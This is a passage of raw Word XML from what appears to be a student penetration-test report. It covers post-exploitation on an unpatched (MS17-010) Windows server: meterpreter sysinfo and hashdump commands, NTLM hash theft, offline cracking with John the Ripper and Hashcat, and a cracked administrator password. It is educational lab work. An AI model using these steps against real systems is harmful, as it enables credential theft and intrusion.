          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74F32359" w14:textId="7C107C2E" w:rsidR="009A6ABD" w:rsidRPr="0022306B" w:rsidRDefault="00E55CC7" w:rsidP="003B694D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="009A6ABD" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">.3 </w:t>
      </w:r>
      <w:r w:rsidR="00E0344B" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Phase Three</w:t>
      </w:r>
      <w:r w:rsidR="009A6ABD" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>: Post-penetration Utilization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EA0031F" w14:textId="77777777"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After taking full control of the server, we launched the post-penetration stage, aiming to deeply mine information, assess the risk of data leakage, and explore the possibility of lateral movement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BA4846B" w14:textId="50FB1FB5" w:rsidR="009A6ABD" w:rsidRPr="0022306B" w:rsidRDefault="00E55CC7" w:rsidP="003B694D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251660800" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3E604E7D" wp14:editId="0FAFF9B7">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>126854</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>318719</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3183890" cy="437134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9.jpg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId14">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3183890" cy="4371340"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="margin">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="margin">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="007C32C0" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>We e</w:t>
      </w:r>
      <w:r w:rsidR="009A6ABD" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>xecut</w:t>
      </w:r>
      <w:r w:rsidR="007C32C0" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>ed</w:t>
      </w:r>
      <w:r w:rsidR="009A6ABD" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> the command: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009A6ABD" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009A6ABD" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009A6ABD" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>sysinfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="007C32C0" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> below (fig. 6).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E714ABC" w14:textId="3F03FCC6" w:rsidR="00E0344B" w:rsidRPr="0022306B" w:rsidRDefault="00E0344B" w:rsidP="007C32C0">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:ind w:left="1260" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 6. </w:t>
      </w:r>
      <w:r w:rsidR="007C32C0" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>getting system information using “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="007C32C0" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>sysinfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="007C32C0" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="336096A2" w14:textId="77777777" w:rsidR="00E0344B" w:rsidRPr="0022306B" w:rsidRDefault="00E0344B" w:rsidP="003B694D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0178D3A4" w14:textId="5B4CFBB1"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The system architecture, operating system version, domain name and other information were </w:t>
      </w:r>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">confirmed to be consistent with the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> scan results, and the list of installed patches could be seen, further confirming the absence of the MS17-010 patch.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05904F2B" w14:textId="77777777" w:rsidR="007C32C0" w:rsidRPr="0022306B" w:rsidRDefault="007C32C0" w:rsidP="003B694D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="135BFB18" w14:textId="26F7FCD1" w:rsidR="009A6ABD" w:rsidRPr="0022306B" w:rsidRDefault="00E55CC7" w:rsidP="003B694D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251661824" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6D0B8EF6" wp14:editId="6F785705">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>290195</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5156835" cy="1099185"/>
            <wp:effectExtent l="0" t="0" r="5715"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7.jpg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5156835" cy="1099185"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="margin">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="margin">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="007C32C0" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>We then e</w:t>
      </w:r>
      <w:r w:rsidR="009A6ABD" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>xecute</w:t>
      </w:r>
      <w:r w:rsidR="007C32C0" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidR="009A6ABD" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> the command: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009A6ABD" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009A6ABD" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009A6ABD" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>hashdump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="007C32C0" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> (fig. 7).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21CDCCA3" w14:textId="134FFADB" w:rsidR="007C32C0" w:rsidRPr="0022306B" w:rsidRDefault="007C32C0" w:rsidP="003B694D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve"> Figure 7. Using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>hashdump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> to see the admin’s hash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ABC8A42" w14:textId="332DDA9D"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We successfully obtained the NTLM hashes of all users, including</w:t>
      </w:r>
      <w:r w:rsidR="006131A3" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> the</w:t>
      </w:r>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Administrator. Although these hashes are not plaintext passwords, they can be directly used to log in to other systems that support NTLM authentication through "Pass-the-Hash" attacks or for offline cracking.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB6E01E" w14:textId="77777777" w:rsidR="006131A3" w:rsidRPr="0022306B" w:rsidRDefault="006131A3" w:rsidP="003B694D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E10D058" w14:textId="77777777"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Offline password cracking:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="672679C0" w14:textId="77777777" w:rsidR="006131A3" w:rsidRPr="0022306B" w:rsidRDefault="006131A3" w:rsidP="003B694D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26159158" w14:textId="008C44D5" w:rsidR="009A6ABD" w:rsidRPr="0022306B" w:rsidRDefault="00E55CC7" w:rsidP="003B694D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251662848" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="76AF4B22" wp14:editId="3DE23BFB">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>544195</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5206365" cy="1310640"/>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3.jpg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId15">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5206365" cy="1310640"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="margin">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="margin">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="009A6ABD" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>We save</w:t>
      </w:r>
      <w:r w:rsidR="006131A3" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidR="009A6ABD" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> the obtained hash of the Administrator account and conduct</w:t>
      </w:r>
      <w:r w:rsidR="006131A3" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>ed</w:t>
      </w:r>
      <w:r w:rsidR="009A6ABD" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> offline brute force cracking using two powerful password cracking tools,</w:t>
      </w:r>
      <w:r w:rsidR="009A6ABD" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> John the Ripper </w:t>
      </w:r>
      <w:r w:rsidR="009A6ABD" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009A6ABD" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Hashcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009A6ABD" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24759A7D" w14:textId="18B1586B" w:rsidR="00E55CC7" w:rsidRPr="0022306B" w:rsidRDefault="007C32C0" w:rsidP="00B168AC">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:ind w:left="420" w:firstLine="420"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Figure 8.</w:t>
      </w:r>
      <w:r w:rsidR="00B168AC" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> John the Ripper with the obtained admin hash </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3518BA54" w14:textId="77777777" w:rsidR="00B168AC" w:rsidRPr="0022306B" w:rsidRDefault="00B168AC" w:rsidP="003B694D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EB465C1" w14:textId="527D009B"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Both tools successfully cracked the password within a short period of time, and the result was: </w:t>
      </w:r>
      <w:r w:rsidR="0089073C" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Manga113</w:t>
      </w:r>
      <w:r w:rsidR="0089073C" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>!”.</w:t>
      </w:r>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> The complexity of this password is relatively low, once again exposing </w:t>
      </w:r>
      <w:r w:rsidR="006131A3" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> security shortcoming of the system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B08DBA" w14:textId="77777777" w:rsidR="00E55CC7" w:rsidRPr="0022306B" w:rsidRDefault="00E55CC7" w:rsidP="003B694D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D4EEE0E" w14:textId="77777777" w:rsidR="00B168AC" w:rsidRPr="0022306B" w:rsidRDefault="00B168AC" w:rsidP="003B694D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="586616B7" w14:textId="77777777" w:rsidR="00B168AC" w:rsidRPr="0022306B" w:rsidRDefault="00B168AC" w:rsidP="003B694D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="191E45E5" w14:textId="77777777" w:rsidR="006131A3" w:rsidRPr="0022306B" w:rsidRDefault="006131A3" w:rsidP="003B694D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="036288F8" w14:textId="77777777" w:rsidR="006131A3" w:rsidRPr="0022306B" w:rsidRDefault="006131A3" w:rsidP="003B694D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40D00F5A" w14:textId="77777777" w:rsidR="006131A3" w:rsidRPr="0022306B" w:rsidRDefault="006131A3" w:rsidP="003B694D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E222C21" w14:textId="77777777" w:rsidR="006131A3" w:rsidRPr="0022306B" w:rsidRDefault="00E55CC7" w:rsidP="003B694D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251663872" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2B23E3ED" wp14:editId="42DA79AB">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>1101090</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>1060450</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2642870" cy="1537970"/>
            <wp:effectExtent l="0" t="0" r="5080" b="5080"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="14" name="图片 14" descr="C:\Users\Administrator\Desktop\HTCS6705-Pentest\Screenshot\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TCS6705-Pentest\Screenshot\2-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2870" cy="1537970"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="009A6ABD" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>We roam</w:t>
      </w:r>
